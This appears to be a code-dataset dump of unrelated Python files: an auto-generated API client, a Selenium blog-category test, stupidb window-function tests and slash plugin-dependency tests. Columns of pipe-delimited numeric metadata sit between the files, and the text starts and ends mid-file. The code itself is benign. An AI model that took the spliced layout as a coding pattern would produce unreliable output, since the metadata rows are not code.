If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method me_get_my_agencies" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'text/json', 'text/html', 'application/xml', 'text/xml']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/v1/me/agencies', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[DomainPublicAdapterWebApiModelsV1AgenciesBriefAgencySummary]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def me_get_my_providers(self, **kwargs): # noqa: E501
"""Retrieves a list of Provider details associated with the current client. This can be used when subscribing to webhooks related to data uploaded by the client. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.me_get_my_providers(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[DomainListingAdminServiceV1ModelProviderResponse]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.me_get_my_providers_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.me_get_my_providers_with_http_info(**kwargs) # noqa: E501
return data
def me_get_my_providers_with_http_info(self, **kwargs): # noqa: E501
"""Retrieves a list of Provider details associated with the current client. This can be used when subscribing to webhooks related to data uploaded by the client. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.me_get_my_providers_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[DomainListingAdminServiceV1ModelProviderResponse]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method me_get_my_providers" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'text/json', 'text/html', 'application/xml', 'text/xml']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/v1/me/providers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[DomainListingAdminServiceV1ModelProviderResponse]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 36.77561
| 186
| 0.628598
| 860
| 7,539
| 5.248837
| 0.189535
| 0.037218
| 0.02171
| 0.031901
| 0.874169
| 0.865973
| 0.865973
| 0.84537
| 0.840053
| 0.840053
| 0
| 0.015045
| 0.285847
| 7,539
| 204
| 187
| 36.955882
| 0.823366
| 0.362913
| 0
| 0.757282
| 1
| 0
| 0.173864
| 0.056749
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048544
| false
| 0
| 0.038835
| 0
| 0.15534
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
816ec2ab2d0cc66c4d924dfeb05229d86bb2f06b
| 7,571
|
py
|
Python
|
LabReport/Lab4/show_post_of_category.py
|
Liu-Hong-De/Software_test
|
068bbadd7b6d369445994e16aea4289618337910
|
[
"Apache-2.0"
] | null | null | null |
LabReport/Lab4/show_post_of_category.py
|
Liu-Hong-De/Software_test
|
068bbadd7b6d369445994e16aea4289618337910
|
[
"Apache-2.0"
] | 1
|
2022-01-21T23:39:34.000Z
|
2022-01-21T23:39:34.000Z
|
LabReport/Lab4/show_post_of_category.py
|
Liu-Hong-De/Software_test
|
068bbadd7b6d369445994e16aea4289618337910
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import time
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class ShowPostOfCategory(unittest.TestCase):
# use the demo account to sign in
def setUp(self):
self.driver = webdriver.Chrome()
driver =self.driver
driver.implicitly_wait(20) # set a waiting time at most 20 seconds
driver.get("http://127.0.0.1:3000")
driver.find_element_by_xpath("//*[@id=\"navbar-collapse\"]/ul[2]/li[2]/a").click() # click the sign in button
time.sleep(1)
driver.find_element_by_name("email").send_keys("demo@keystonejs.com") # enter the email and password
driver.find_element_by_name("password").send_keys("demo")
time.sleep(1)
driver.find_element_by_xpath("//*[@id=\"signin-view\"]/div/div[1]/div/div[2]/form/button").click() # click to sign in
time.sleep(2)
# test show post of category success
def test_ShowPostOfCategorySuccess(self):
driver = self.driver
# create a category
driver.find_element_by_xpath("//*[@id=\"react-root\"]/div/main/div/div[2]/div/div[1]/div[2]/div[3]/span/a[2]").click()
time.sleep(1)
driver.find_element_by_name("name").send_keys("use selenium to create a category")
time.sleep(1)
try:
driver.find_element_by_class_name("css-h629qq").click()
except:
driver.find_element_by_class_name("css-nil").submit()
time.sleep(1)
driver.find_element_by_class_name("css-dmf4a8").click()
time.sleep(1)
# create a post
driver.find_element_by_css_selector("#react-root > div > header > nav.primary-navbar > div > ul.app-nav.app-nav--primary.app-nav--left > li.primary-navbar__item.primary-navbar__brand > a").click()
time.sleep(1)
driver.find_element_by_css_selector("#react-root > div > main > div > div.dashboard-groups > div > div:nth-child(1) > div.dashboard-group__lists > div:nth-child(1) > span > a.dashboard-group__list-create.octicon.octicon-plus").click()
time.sleep(1)
driver.find_element_by_name("name").send_keys("use selenium to create a post")
time.sleep(1)
try:
driver.find_element_by_class_name("css-h629qq").click()
except:
driver.find_element_by_class_name("css-nil").submit()
time.sleep(1)
driver.refresh()
time.sleep(1)
inputList = driver.find_elements_by_tag_name("input")
inputListData = []
[inputListData.append(input) for input in inputList if input.is_displayed()]
inputListData[2].send_keys("Published")
inputListData[2].send_keys(Keys.ENTER)
time.sleep(1)
inputListData[5].send_keys("use selenium to create a category")
time.sleep(1)
inputListData[5].send_keys(Keys.ENTER)
time.sleep(1)
driver.find_element_by_class_name("css-2960tt").click()
time.sleep(1)
# go to blog page
driver.find_element_by_css_selector("#react-root > div > header > nav.primary-navbar > div > ul.app-nav.app-nav--primary.app-nav--right > li:nth-child(1) > a").click()
time.sleep(1)
driver.find_element_by_link_text("Blog").click()
time.sleep(1)
driver.find_element_by_partial_link_text("category").click()
time.sleep(10)
assert "use selenium to create a post" in driver.find_element_by_css_selector("body > div > div.row > div.col-sm-8 > div.blog > article > div.media-body > h3 > a").text
# test show post of category failed
def test_ShowPostOfCategoryFailed(self):
driver = self.driver
# create a category
driver.find_element_by_xpath("//*[@id=\"react-root\"]/div/main/div/div[2]/div/div[1]/div[2]/div[3]/span/a[2]").click()
time.sleep(1)
driver.find_element_by_name("name").send_keys("use selenium to create a category")
time.sleep(1)
try:
driver.find_element_by_class_name("css-h629qq").click()
except:
driver.find_element_by_class_name("css-nil").submit()
time.sleep(1)
driver.find_element_by_class_name("css-dmf4a8").click()
time.sleep(1)
# create a post
driver.find_element_by_css_selector("#react-root > div > header > nav.primary-navbar > div > ul.app-nav.app-nav--primary.app-nav--left > li.primary-navbar__item.primary-navbar__brand > a").click()
time.sleep(1)
driver.find_element_by_css_selector("#react-root > div > main > div > div.dashboard-groups > div > div:nth-child(1) > div.dashboard-group__lists > div:nth-child(1) > span > a.dashboard-group__list-create.octicon.octicon-plus").click()
time.sleep(1)
driver.find_element_by_name("name").send_keys("use selenium to create a post")
time.sleep(1)
try:
driver.find_element_by_class_name("css-h629qq").click()
except:
driver.find_element_by_class_name("css-nil").submit()
time.sleep(1)
driver.refresh()
time.sleep(1)
inputList = driver.find_elements_by_tag_name("input")
inputListData = []
[inputListData.append(input) for input in inputList if input.is_displayed()]
inputListData[2].send_keys("Published")
inputListData[2].send_keys(Keys.ENTER)
time.sleep(1)
driver.find_element_by_class_name("css-2960tt").click()
time.sleep(1)
# go to blog page
driver.find_element_by_css_selector("#react-root > div > header > nav.primary-navbar > div > ul.app-nav.app-nav--primary.app-nav--right > li:nth-child(1) > a").click()
time.sleep(1)
driver.find_element_by_link_text("Blog").click()
time.sleep(1)
driver.find_element_by_partial_link_text("category").click()
time.sleep(10)
assert "No posts in the category use selenium to create a category" in driver.find_element_by_css_selector("body > div > div.row > div.col-sm-8 > div > h3").text
def tearDown(self):
    """Clean up after the test: delete the post and the category created
    during the test via the Admin UI, then close the browser window.

    NOTE(review): the ``css-*`` class names below look like generated CSS
    hashes tied to a specific frontend build — verify they still match the
    deployed Admin UI before relying on this teardown.
    """
    driver = self.driver
    # delete the post: navigate from the Admin UI link to the first list tile
    driver.find_element_by_link_text("Admin UI").click()
    time.sleep(1)
    driver.find_element_by_css_selector("#react-root > div > main > div > div.dashboard-groups > div > div:nth-child(1) > div.dashboard-group__lists > div:nth-child(1) > span > a.dashboard-group__list-tile").click()
    time.sleep(1)
    # open the item's action button, then click through the (presumed)
    # select/delete/confirm sequence — TODO confirm what each css-* button is
    driver.find_element_by_css_selector("#react-root > div > main > div > div > div:nth-child(2) > div > div:nth-child(1) > div > div > button").click()
    time.sleep(1)
    driver.find_element_by_class_name("css-12yx24t").click()
    time.sleep(1)
    driver.find_element_by_class_name("css-rd63ky").click()
    time.sleep(1)
    driver.find_element_by_class_name("css-t4884").click()
    time.sleep(2)
    # delete the category: same click sequence, reached via the secondary navbar
    driver.find_element_by_css_selector("#react-root > div > header > nav.secondary-navbar > div > ul > li:nth-child(3) > a").click()
    time.sleep(1)
    driver.find_element_by_css_selector("#react-root > div > main > div > div > div:nth-child(2) > div > div:nth-child(1) > div > div > button").click()
    time.sleep(1)
    driver.find_element_by_class_name("css-12yx24t").click()
    time.sleep(1)
    driver.find_element_by_class_name("css-rd63ky").click()
    time.sleep(1)
    driver.find_element_by_class_name("css-t4884").click()
    time.sleep(2)
    driver.close()
if __name__ == "__main__":
    # run this selenium test module directly with the unittest runner
    unittest.main()
| 50.139073
| 242
| 0.648131
| 1,079
| 7,571
| 4.339203
| 0.134384
| 0.100384
| 0.163392
| 0.182614
| 0.845792
| 0.828919
| 0.804998
| 0.792824
| 0.785775
| 0.785775
| 0
| 0.02365
| 0.212521
| 7,571
| 151
| 243
| 50.139073
| 0.761657
| 0.04504
| 0
| 0.8
| 0
| 0.1
| 0.310326
| 0.084685
| 0
| 0
| 0
| 0
| 0.015385
| 1
| 0.030769
| false
| 0.007692
| 0.030769
| 0
| 0.069231
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
817f0c4b21cf9ad11d4488a6d0ae230cfcad5964
| 4,227
|
py
|
Python
|
stupidb/tests/test_navigation.py
|
mrcrnkovich/stupidb
|
4274f60b7f8f2455c0031c73e053964d4d3e3e1d
|
[
"Apache-2.0"
] | 43
|
2018-12-29T22:14:55.000Z
|
2022-03-17T03:38:16.000Z
|
stupidb/tests/test_navigation.py
|
mrcrnkovich/stupidb
|
4274f60b7f8f2455c0031c73e053964d4d3e3e1d
|
[
"Apache-2.0"
] | 102
|
2021-07-19T21:20:22.000Z
|
2022-03-22T02:57:02.000Z
|
stupidb/tests/test_navigation.py
|
mrcrnkovich/stupidb
|
4274f60b7f8f2455c0031c73e053964d4d3e3e1d
|
[
"Apache-2.0"
] | 3
|
2021-12-04T19:14:33.000Z
|
2022-01-08T17:28:36.000Z
|
from __future__ import annotations
from datetime import date
from typing import Mapping
from stupidb import Window, const, first, get, lag, last, lead, nth, over, select, table
from .conftest import Element, assert_rowset_equal
def test_first_last(t_rows: list[dict[str, Element]]) -> None:
    """first()/last() over a range window partitioned by ``name``; also checks
    that first() over an all-NULL column yields None."""
    win = Window.range(partition_by=[get("name")])
    query = table(t_rows) >> select(
        first_date=first(get("date")) >> over(win),
        last_date=last(get("date")) >> over(win),
        first_date_nulls=first(const(None)) >> over(win),
    )
    # first partition: four rows spanning 2018-01-01 .. 2018-01-07
    group_one = [
        {
            "first_date": date(2018, 1, 1),
            "last_date": date(2018, 1, 7),
            "first_date_nulls": None,
        }
        for _ in range(4)
    ]
    # second partition: three rows spanning 2018-01-02 .. 2018-01-04
    group_two = [
        {
            "first_date": date(2018, 1, 2),
            "last_date": date(2018, 1, 4),
            "first_date_nulls": None,
        }
        for _ in range(3)
    ]
    assert_rowset_equal(list(query), group_one + group_two)
def test_nth(t_rows: list[dict[str, Element]]) -> None:
    """nth(date, 1) per partition: the second date within each name group."""
    win = Window.range(partition_by=[get("name")])
    query = table(t_rows) >> select(
        nth_date=nth(get("date"), const(1)) >> over(win)
    )
    expected = [{"nth_date": date(2018, 1, 4)} for _ in range(4)]
    expected += [{"nth_date": date(2018, 1, 3)} for _ in range(3)]
    assert_rowset_equal(list(query), expected)
def test_nth_past_frame(t_rows: list[dict[str, Element]]) -> None:
    """nth() with an index far beyond the frame yields None for every row."""
    win = Window.range(partition_by=[get("name")])
    query = table(t_rows) >> select(
        nth_date=nth(get("date"), const(4000)) >> over(win)
    )
    expected = [{"nth_date": None} for _ in range(7)]
    assert_rowset_equal(list(query), expected)
def test_nth_past_frame_preceding_following(t_rows: list[dict[str, Element]]) -> None:
    """Same as test_nth_past_frame, but with explicit preceding/following
    bounds on the range window — the out-of-frame index still yields None."""
    win = Window.range(
        partition_by=[get("name")],
        preceding=const(200),
        following=const(1000),
    )
    query = table(t_rows) >> select(
        nth_date=nth(get("date"), const(4000)) >> over(win)
    )
    expected = [{"nth_date": None} for _ in range(7)]
    assert_rowset_equal(list(query), expected)
def test_lead_lag(t_rows: list[dict[str, Element]]) -> None:
    """lead()/lag() by one row within each name partition; boundary rows
    produce None."""
    win = Window.range(partition_by=[get("name")])
    query = table(t_rows) >> select(
        lead_date=lead(get("date"), const(1)) >> over(win),
        lag_date=lag(get("date"), const(1)) >> over(win),
    )
    # (lead, lag) pairs in row order, first partition then second
    pairs = [
        (date(2018, 1, 4), None),
        (date(2018, 1, 6), date(2018, 1, 1)),
        (date(2018, 1, 7), date(2018, 1, 4)),
        (None, date(2018, 1, 6)),
        (date(2018, 1, 3), None),
        (date(2018, 1, 4), date(2018, 1, 2)),
        (None, date(2018, 1, 3)),
    ]
    expected: list[Mapping[str, Element]] = [
        {"lead_date": ld, "lag_date": lg} for ld, lg in pairs
    ]
    assert_rowset_equal(list(query), expected)
| 31.080882
| 88
| 0.564467
| 570
| 4,227
| 3.982456
| 0.096491
| 0.109251
| 0.163877
| 0.177533
| 0.829956
| 0.814978
| 0.744934
| 0.744934
| 0.744934
| 0.662996
| 0
| 0.067572
| 0.285782
| 4,227
| 135
| 89
| 31.311111
| 0.684333
| 0
| 0
| 0.663934
| 0
| 0
| 0.011356
| 0
| 0
| 0
| 0
| 0
| 0.04918
| 1
| 0.040984
| false
| 0
| 0.040984
| 0
| 0.081967
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81b15ab2ebd9e6ea648ebb18c81a4d26cb4583fe
| 19,342
|
py
|
Python
|
tests/test_plugin_dependency.py
|
kbh2o/slash
|
532b7e3acdf46103ece5b86f21c29f9b58587289
|
[
"BSD-3-Clause"
] | 70
|
2015-12-05T12:33:10.000Z
|
2022-03-03T04:56:58.000Z
|
tests/test_plugin_dependency.py
|
kbh2o/slash
|
532b7e3acdf46103ece5b86f21c29f9b58587289
|
[
"BSD-3-Clause"
] | 711
|
2015-10-06T11:01:48.000Z
|
2022-02-09T12:40:47.000Z
|
tests/test_plugin_dependency.py
|
kbh2o/slash
|
532b7e3acdf46103ece5b86f21c29f9b58587289
|
[
"BSD-3-Clause"
] | 37
|
2015-10-13T11:00:51.000Z
|
2022-02-08T07:28:11.000Z
|
import pytest
import slash.plugins
from .conftest import Checkpoint
from .utils import maybe_decorate
from slash.plugins import PluginInterface
from gossip.exceptions import CannotResolveDependencies
@pytest.mark.parametrize('needs_decorate_method', [True, False])
@pytest.mark.parametrize('provides_decorate_method', [True, False])
def test_needs_provides_plugin_name(needs_decorate_method, provides_decorate_method, checkpoint1, checkpoint2):
    """needs('p')/provides('p') order the plugins correctly whether each
    decorator is applied at class level or at method level (all 4 combos)."""
    @slash.plugins.active  # pylint: disable=abstract-method, unused-variable
    @maybe_decorate(slash.plugins.needs('p'), not needs_decorate_method)
    @autoname
    class NeedsPlugin(PluginInterface):

        @maybe_decorate(slash.plugins.needs('p'), needs_decorate_method)
        def session_start(self):
            checkpoint2()

    @slash.plugins.active  # pylint: disable=abstract-method, unused-variable
    @maybe_decorate(slash.plugins.provides('p'), not provides_decorate_method)
    @autoname
    class ProvidesPlugin(PluginInterface):

        @maybe_decorate(slash.plugins.provides('p'), provides_decorate_method)
        def session_start(self):
            checkpoint1()

    slash.hooks.session_start()  # pylint: disable=no-member
    # the providing plugin must have fired before the needing one
    assert checkpoint1.timestamp < checkpoint2.timestamp
def test_provides_globally_needs_globally(checkpoint1, checkpoint2):
    '''
    Plugin A: Provides x at class level
    Plugin B: Needs x at class level
    '''
    @slash.plugins.provides('x')
    class PluginA(slash.plugins.interface.PluginInterface):

        def get_name(self):
            return 'plugin a'

        def session_start(self):
            checkpoint1()

        def test_start(self):
            pass

    @slash.plugins.needs('x')
    class PluginB(slash.plugins.interface.PluginInterface):

        def get_name(self):
            return 'plugin b'

        def session_start(self):
            checkpoint2()

        def error_added(self, result, error):  # pylint: disable=unused-argument
            pass

    for plugin_cls in [PluginA, PluginB]:
        slash.plugins.manager.install(plugin_cls(), activate_later=True)
    slash.plugins.manager.activate_pending_plugins()

    # the provider must fire before the needer
    slash.hooks.session_start()  # pylint: disable=no-member
    assert checkpoint1.timestamp < checkpoint2.timestamp

    # once the provider is deactivated, the dependency becomes unmet
    slash.plugins.manager.deactivate('plugin a')
    with pytest.raises(CannotResolveDependencies) as caught:
        slash.hooks.session_start()  # pylint: disable=no-member
    assert caught.value.unmet_dependencies == set(['x'])
def test_provides_globally_needs_specific_hook(checkpoint1, checkpoint2):
    '''
    Plugin A: Provides x at class level
    Plugin B: Needs x for a specific hook only
    '''
    @slash.plugins.provides('x')
    class PluginA(slash.plugins.interface.PluginInterface):

        def get_name(self):
            return 'plugin a'

        def session_start(self):
            checkpoint1()

        def test_start(self):
            pass

    class PluginB(slash.plugins.interface.PluginInterface):

        def get_name(self):
            return 'plugin b'

        @slash.plugins.needs('x')
        def session_start(self):
            checkpoint2()

        def error_added(self, result, error):  # pylint: disable=unused-argument
            pass

    for plugin_cls in [PluginA, PluginB]:
        slash.plugins.manager.install(plugin_cls(), activate_later=True)
    slash.plugins.manager.activate_pending_plugins()

    # the provider must fire before the hook-level needer
    slash.hooks.session_start()  # pylint: disable=no-member
    assert checkpoint1.timestamp < checkpoint2.timestamp

    # deactivating the provider leaves the hook-level need unmet
    slash.plugins.manager.deactivate('plugin a')
    with pytest.raises(CannotResolveDependencies) as caught:
        slash.hooks.session_start()  # pylint: disable=no-member
    assert caught.value.unmet_dependencies == set(['x'])
def test_provides_globally_needs_specific_hook_which_does_not_exist_at_a(checkpoint2):
    '''
    Plugin A: Provides x at class level
    Plugin B: Needs x for a specific hook; that hook is not defined in A
    Expectations:
        Should work in the empty sense:
        all non-needing hooks should work even when missing from A; the
        specific hook still needs to happen in A (empty registration) before B.
    '''
    @slash.plugins.provides('x')
    class PluginA(slash.plugins.interface.PluginInterface):

        def get_name(self):
            return 'plugin a'

        def test_start(self):
            pass

    class PluginB(slash.plugins.interface.PluginInterface):

        def get_name(self):
            return 'plugin b'

        @slash.plugins.needs('x')
        def session_start(self):
            checkpoint2()

        def error_added(self, result, error):  # pylint: disable=unused-argument
            pass

    for plugin_cls in [PluginA, PluginB]:
        slash.plugins.manager.install(plugin_cls(), activate_later=True)
    slash.plugins.manager.activate_pending_plugins()

    # B's session_start still runs even though A has no session_start
    slash.hooks.session_start()  # pylint: disable=no-member
    assert checkpoint2.called

    # without A, the dependency on x cannot be resolved
    slash.plugins.manager.deactivate('plugin a')
    with pytest.raises(CannotResolveDependencies) as caught:
        slash.hooks.session_start()  # pylint: disable=no-member
    assert caught.value.unmet_dependencies == set(['x'])
def test_provides_specific_hook_needs_globally(checkpoint1, checkpoint2):
    '''
    Plugin A: Provides x on a specific hook
    Plugin B: Needs x at class level
    Expectations:
        This case should fail, because logically the other hooks don't have
        anyone to provide x for them
    '''
    class PluginA(slash.plugins.interface.PluginInterface):

        def get_name(self):
            return 'plugin a'

        @slash.plugins.provides('x')
        def session_start(self):
            checkpoint1()

        def test_start(self):
            pass

    @slash.plugins.needs('x')
    class PluginB(slash.plugins.interface.PluginInterface):

        def get_name(self):
            return 'plugin b'

        def session_start(self):
            checkpoint2()

        def error_added(self, result, error):  # pylint: disable=unused-argument
            pass

    for plugin_cls in [PluginA, PluginB]:
        slash.plugins.manager.install(plugin_cls(), activate_later=True)
    slash.plugins.manager.activate_pending_plugins()

    # session_start has a provider on that specific hook, so it works
    slash.hooks.session_start()  # pylint: disable=no-member
    # error_added has no provider of x, so B's class-level need is unmet
    with pytest.raises(CannotResolveDependencies) as caught:
        slash.hooks.error_added(result=None, error=None)  # pylint: disable=no-member
    assert caught.value.unmet_dependencies == set(['x'])
def test_provides_specific_hook_needs_globally_with_this_hook_only(checkpoint1, checkpoint2):
    '''
    Plugin A: Provides x on a specific hook
    Plugin B: Needs x at class level, but only has one hook (the one provided by A)
    '''
    class PluginA(slash.plugins.interface.PluginInterface):

        def get_name(self):
            return 'plugin a'

        @slash.plugins.provides('x')
        def session_start(self):
            checkpoint1()

        def test_start(self):
            pass

    @slash.plugins.needs('x')
    class PluginB(slash.plugins.interface.PluginInterface):

        def get_name(self):
            return 'plugin b'

        def session_start(self):
            checkpoint2()

    for plugin_cls in [PluginA, PluginB]:
        slash.plugins.manager.install(plugin_cls(), activate_later=True)
    slash.plugins.manager.activate_pending_plugins()

    # A's method-level provide satisfies B's only hook
    slash.hooks.session_start()  # pylint: disable=no-member
    assert checkpoint1.timestamp < checkpoint2.timestamp

    # without A the need is unmet
    slash.plugins.manager.deactivate('plugin a')
    with pytest.raises(CannotResolveDependencies) as caught:
        slash.hooks.session_start()  # pylint: disable=no-member
    assert caught.value.unmet_dependencies == set(['x'])
@pytest.mark.parametrize('needs_parent_level', [True, False])
@pytest.mark.parametrize('provides_parent_level', [True, False])
def test_provides_needs_with_inheritence_on_class_level(checkpoint, checkpoint1, checkpoint2, needs_parent_level, provides_parent_level):
    '''
    Plugin A: Provides x at class level (by itself or by inheritance)
    Plugin B: Needs x at class level (by itself or by inheritance)
    '''
    # pylint: disable=abstract-method
    @maybe_decorate(slash.plugins.provides('x'), provides_parent_level)
    class PluginAParent(slash.plugins.interface.PluginInterface):

        def test_start(self):
            pass

    @maybe_decorate(slash.plugins.provides('x'), not provides_parent_level)
    class PluginA(PluginAParent):

        def get_name(self):
            return 'plugin a'

        def session_start(self):
            checkpoint1()

    @maybe_decorate(slash.plugins.needs('x'), needs_parent_level)
    class PluginBParent(slash.plugins.interface.PluginInterface):

        def error_added(self, result, error):  # pylint: disable=unused-argument
            checkpoint()

    @maybe_decorate(slash.plugins.needs('x'), not needs_parent_level)
    class PluginB(PluginBParent):

        def get_name(self):
            return 'plugin b'

        def session_start(self):
            checkpoint2()

    for plugin_cls in [PluginA, PluginB]:
        slash.plugins.manager.install(plugin_cls(), activate_later=True)
    slash.plugins.manager.activate_pending_plugins()

    # session_start hook should be provided by the PluginA.session_start method
    slash.hooks.session_start()  # pylint: disable=no-member
    assert checkpoint1.timestamp < checkpoint2.timestamp
    # error_added hook should be provided by empty registration of PluginA
    slash.hooks.error_added(result=None, error=None)  # pylint: disable=no-member
    assert checkpoint.called
    slash.plugins.manager.deactivate('plugin a')
    with pytest.raises(CannotResolveDependencies) as caught:
        slash.hooks.session_start()  # pylint: disable=no-member
    assert caught.value.unmet_dependencies == set(['x'])
    with pytest.raises(CannotResolveDependencies) as caught:
        slash.hooks.error_added()  # pylint: disable=no-member
    assert caught.value.unmet_dependencies == set(['x'])
    # Ensure only hooks required by PluginB fail
    slash.hooks.test_end()  # pylint: disable=no-member
def test_provides_needs_in_both_inheritence_levels(checkpoint, checkpoint1, checkpoint2):
    """Parent classes provide/need 'x', children provide/need 'y'; both
    class-level declarations accumulate through inheritance."""
    # pylint: disable=abstract-method
    @slash.plugins.provides('x')
    class PluginAParent(slash.plugins.interface.PluginInterface):

        def test_start(self):
            pass

    @slash.plugins.provides('y')
    class PluginA(PluginAParent):

        def get_name(self):
            return 'plugin a'

        def session_start(self):
            checkpoint1()

    @slash.plugins.needs('x')
    class PluginBParent(slash.plugins.interface.PluginInterface):

        def error_added(self, result, error):  # pylint: disable=unused-argument
            checkpoint()

    @slash.plugins.needs('y')
    class PluginB(PluginBParent):

        def get_name(self):
            return 'plugin b'

        def session_start(self):
            checkpoint2()

    for plugin_cls in [PluginA, PluginB]:
        slash.plugins.manager.install(plugin_cls(), activate_later=True)
    slash.plugins.manager.activate_pending_plugins()

    # session_start hook should be provided by the PluginA.session_start method
    slash.hooks.session_start()  # pylint: disable=no-member
    assert checkpoint1.timestamp < checkpoint2.timestamp
    # error_added hook should be provided by empty registration of PluginA
    slash.hooks.error_added(result=None, error=None)  # pylint: disable=no-member
    assert checkpoint.called
    slash.plugins.manager.deactivate('plugin a')
    with pytest.raises(CannotResolveDependencies) as caught:
        slash.hooks.session_start()  # pylint: disable=no-member
    assert caught.value.unmet_dependencies == set(['x', 'y'])
    with pytest.raises(CannotResolveDependencies) as caught:
        slash.hooks.error_added()  # pylint: disable=no-member
    assert caught.value.unmet_dependencies == set(['x', 'y'])
    # Ensure only hooks required by PluginB fail
    slash.hooks.test_end()  # pylint: disable=no-member
def test_provides_needs_with_inheritence_on_method_level(checkpoint):
    '''
    Plugin A: Provides x at method level (by itself or by inheritance) on test_start & session_start
    Plugin B: Needs x at method level (by itself or by inheritance) on test_start & session_start
    '''
    # pylint: disable=abstract-method
    session_start_a = Checkpoint()
    session_start_b = Checkpoint()
    test_start_a = Checkpoint()
    test_start_b = Checkpoint()

    class PluginAParent(slash.plugins.interface.PluginInterface):

        @slash.plugins.provides('x')
        def test_start(self):
            test_start_a()

    class PluginA(PluginAParent):

        def get_name(self):
            return 'plugin a'

        @slash.plugins.provides('x')
        def session_start(self):
            session_start_a()

    class PluginBParent(slash.plugins.interface.PluginInterface):

        @slash.plugins.needs('x')
        def session_start(self):
            session_start_b()

        def error_added(self, result, error):  # pylint: disable=unused-argument
            checkpoint()

    class PluginB(PluginBParent):

        def get_name(self):
            return 'plugin b'

        @slash.plugins.needs('x')
        def test_start(self):
            test_start_b()

    for plugin_cls in [PluginA, PluginB]:
        slash.plugins.manager.install(plugin_cls(), activate_later=True)
    slash.plugins.manager.activate_pending_plugins()

    slash.hooks.session_start()  # pylint: disable=no-member
    assert session_start_a.timestamp < session_start_b.timestamp
    slash.hooks.test_start()  # pylint: disable=no-member
    assert test_start_a.timestamp < test_start_b.timestamp
    # error_added hook should not need anything
    slash.hooks.error_added(result=None, error=None)  # pylint: disable=no-member
    assert checkpoint.called
    slash.plugins.manager.deactivate('plugin a')
    with pytest.raises(CannotResolveDependencies) as caught:
        slash.hooks.session_start()  # pylint: disable=no-member
    assert caught.value.unmet_dependencies == set(['x'])
    with pytest.raises(CannotResolveDependencies) as caught:
        slash.hooks.test_start()  # pylint: disable=no-member
        # NOTE(review): unreachable if test_start raises first — possibly
        # mis-indented in the original; confirm intended placement
        slash.hooks.error_added(result=None, error=None)  # pylint: disable=no-member
    assert caught.value.unmet_dependencies == set(['x'])
def test_provides_needs_with_child_overrides():
    # pylint: disable=line-too-long
    '''
    | Hook Name     | Plugin A                                                                | Plugin B                                                               |
    |---------------+-------------------------------------------------------------------------+------------------------------------------------------------------------|
    | session_start | Child Provides x in method level, overrides parent's empty registration | Needs x (Parent) & y (Child) in class level                            |
    | test_start    | Child Provides x in method level, overrides parent's real registration  | Needs x (Parent) & y (Child) in class level                            |
    | error_added   | x is not provided, overrides parent's real registration                 | Needs x (Parent) & y (Child) in class level                            |
    | test_end      | x is not provided, overrides parent's empty registration                | Needs x (Parent) & y (Child) in class level                            |
    | session_end   | Parent provides x, child provides y - both in class level               | Needs x (Parent) & y (Child) in class level, z in (child) method level |
    '''
    # pylint: disable=abstract-method
    session_start_a = Checkpoint()
    session_start_b = Checkpoint()
    test_start_a = Checkpoint()
    test_start_b = Checkpoint()

    @slash.plugins.provides('x')
